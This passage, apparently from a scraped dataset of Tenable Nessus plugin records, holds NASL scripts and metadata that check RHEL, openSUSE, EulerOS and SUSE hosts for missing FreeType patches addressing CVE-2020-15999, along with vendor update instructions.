'rhel_eus_8_2_sap_hana', 'rhel_eus_8_2_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_2_appstream', 'rhel_tus_8_2_baseos', 'rhel_tus_8_2_highavailability']},\n {'reference':'freetype-2.9.1-4.el8_2.1', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_8_2_appstream', 'rhel_aus_8_2_baseos', 'rhel_e4s_8_2_appstream', 'rhel_e4s_8_2_baseos', 'rhel_e4s_8_2_highavailability', 'rhel_e4s_8_2_sap', 'rhel_e4s_8_2_sap_hana', 'rhel_eus_8_2_appstream', 'rhel_eus_8_2_baseos', 'rhel_eus_8_2_crb', 'rhel_eus_8_2_highavailability', 'rhel_eus_8_2_resilientstorage', 'rhel_eus_8_2_sap', 'rhel_eus_8_2_sap_hana', 'rhel_eus_8_2_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_2_appstream', 'rhel_tus_8_2_baseos', 'rhel_tus_8_2_highavailability']},\n {'reference':'freetype-devel-2.9.1-4.el8_2.1', 'sp':'2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_8_2_appstream', 'rhel_aus_8_2_baseos', 'rhel_e4s_8_2_appstream', 'rhel_e4s_8_2_baseos', 'rhel_e4s_8_2_highavailability', 'rhel_e4s_8_2_sap', 'rhel_e4s_8_2_sap_hana', 'rhel_eus_8_2_appstream', 'rhel_eus_8_2_baseos', 'rhel_eus_8_2_crb', 'rhel_eus_8_2_highavailability', 'rhel_eus_8_2_resilientstorage', 'rhel_eus_8_2_sap', 'rhel_eus_8_2_sap_hana', 'rhel_eus_8_2_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_2_appstream', 'rhel_tus_8_2_baseos', 'rhel_tus_8_2_highavailability']},\n {'reference':'freetype-devel-2.9.1-4.el8_2.1', 'sp':'2', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_8_2_appstream', 'rhel_aus_8_2_baseos', 'rhel_e4s_8_2_appstream', 'rhel_e4s_8_2_baseos', 'rhel_e4s_8_2_highavailability', 'rhel_e4s_8_2_sap', 'rhel_e4s_8_2_sap_hana', 'rhel_eus_8_2_appstream', 'rhel_eus_8_2_baseos', 'rhel_eus_8_2_crb', 'rhel_eus_8_2_highavailability', 'rhel_eus_8_2_resilientstorage', 'rhel_eus_8_2_sap', 'rhel_eus_8_2_sap_hana', 'rhel_eus_8_2_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_2_appstream', 'rhel_tus_8_2_baseos', 'rhel_tus_8_2_highavailability']},\n {'reference':'freetype-devel-2.9.1-4.el8_2.1', 'sp':'2', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_8_2_appstream', 'rhel_aus_8_2_baseos', 'rhel_e4s_8_2_appstream', 'rhel_e4s_8_2_baseos', 'rhel_e4s_8_2_highavailability', 'rhel_e4s_8_2_sap', 'rhel_e4s_8_2_sap_hana', 'rhel_eus_8_2_appstream', 'rhel_eus_8_2_baseos', 'rhel_eus_8_2_crb', 'rhel_eus_8_2_highavailability', 'rhel_eus_8_2_resilientstorage', 'rhel_eus_8_2_sap', 'rhel_eus_8_2_sap_hana', 'rhel_eus_8_2_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_2_appstream', 'rhel_tus_8_2_baseos', 'rhel_tus_8_2_highavailability']},\n {'reference':'freetype-devel-2.9.1-4.el8_2.1', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_8_2_appstream', 'rhel_aus_8_2_baseos', 'rhel_e4s_8_2_appstream', 'rhel_e4s_8_2_baseos', 'rhel_e4s_8_2_highavailability', 'rhel_e4s_8_2_sap', 'rhel_e4s_8_2_sap_hana', 'rhel_eus_8_2_appstream', 'rhel_eus_8_2_baseos', 'rhel_eus_8_2_crb', 'rhel_eus_8_2_highavailability', 'rhel_eus_8_2_resilientstorage', 'rhel_eus_8_2_sap', 'rhel_eus_8_2_sap_hana', 'rhel_eus_8_2_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_2_appstream', 'rhel_tus_8_2_baseos', 'rhel_tus_8_2_highavailability']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-devel');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:39:02", "description": "This update for freetype2 fixes the following issues :\n\n - CVE-2020-15999: fixed a heap buffer overflow found in the handling of embedded PNG bitmaps (bsc#1177914).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : freetype2 (openSUSE-2020-1734)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:freetype2-debugsource", "p-cpe:/a:novell:opensuse:freetype2-devel", "p-cpe:/a:novell:opensuse:freetype2-devel-32bit", "p-cpe:/a:novell:opensuse:freetype2-profile-tti35", "p-cpe:/a:novell:opensuse:ft2demos", "p-cpe:/a:novell:opensuse:ftbench", "p-cpe:/a:novell:opensuse:ftdiff", "p-cpe:/a:novell:opensuse:ftdump", "p-cpe:/a:novell:opensuse:ftgamma", "p-cpe:/a:novell:opensuse:ftgrid", "p-cpe:/a:novell:opensuse:ftinspect", "p-cpe:/a:novell:opensuse:ftlint", "p-cpe:/a:novell:opensuse:ftmulti", "p-cpe:/a:novell:opensuse:ftstring", "p-cpe:/a:novell:opensuse:ftvalid", "p-cpe:/a:novell:opensuse:ftview", "p-cpe:/a:novell:opensuse:libfreetype6", "p-cpe:/a:novell:opensuse:libfreetype6-32bit", "p-cpe:/a:novell:opensuse:libfreetype6-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libfreetype6-debuginfo", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-1734.NASL", "href": "https://www.tenable.com/plugins/nessus/142039", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1734.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142039);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : freetype2 (openSUSE-2020-1734)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for freetype2 fixes the following issues :\n\n - CVE-2020-15999: fixed a heap buffer overflow found in\n the handling of embedded PNG bitmaps (bsc#1177914).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1177914\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freetype2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freetype2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freetype2-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freetype2-profile-tti35\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ft2demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftbench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftdiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftgamma\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftgrid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftinspect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftlint\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftmulti\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftvalid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ftview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreetype6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreetype6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreetype6-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreetype6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"freetype2-debugsource-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"freetype2-devel-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"freetype2-profile-tti35-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libfreetype6-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libfreetype6-debuginfo-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"freetype2-devel-32bit-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ft2demos-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftbench-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftdiff-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftdump-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftgamma-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftgrid-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftinspect-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftlint-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftmulti-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftstring-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftvalid-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"ftview-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-2.10.1-lp151.4.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-debuginfo-2.10.1-lp151.4.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype2-debugsource / freetype2-devel / freetype2-profile-tti35 / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:41:37", "description": "According to the version of the freetype package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-12-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : freetype (EulerOS-SA-2020-2483)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:freetype", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2483.NASL", "href": "https://www.tenable.com/plugins/nessus/143413", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143413);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"EulerOS 2.0 SP9 : freetype (EulerOS-SA-2020-2483)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the freetype package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior\n to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML\n page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2483\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc07def5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"freetype-2.10.1-1.h1.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:43:59", "description": "This update for freetype2 fixes the following issues :\n\nCVE-2020-15999: fixed a heap buffer overflow found in the handling of embedded PNG bitmaps (bsc#1177914).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : freetype2 (SUSE-SU-2020:2998-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:freetype2-debugsource", "p-cpe:/a:novell:suse_linux:ft2demos", "p-cpe:/a:novell:suse_linux:libfreetype6", "p-cpe:/a:novell:suse_linux:libfreetype6-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2998-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143626", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2998-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143626);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"SUSE SLES12 Security Update : freetype2 (SUSE-SU-2020:2998-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for freetype2 fixes the following issues :\n\nCVE-2020-15999: fixed a heap buffer overflow found in the handling of\nembedded PNG bitmaps (bsc#1177914).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1177914\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-15999/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202998-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4262263c\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2020-2998=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2020-2998=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2020-2998=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2020-2998=1\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-2998=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-2998=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2020-2998=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2020-2998=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-2998=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-2998=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2020-2998=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2020-2998=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2020-2998=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-2998=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-2998=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2020-2998=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2020-2998=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:freetype2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ft2demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreetype6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreetype6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an 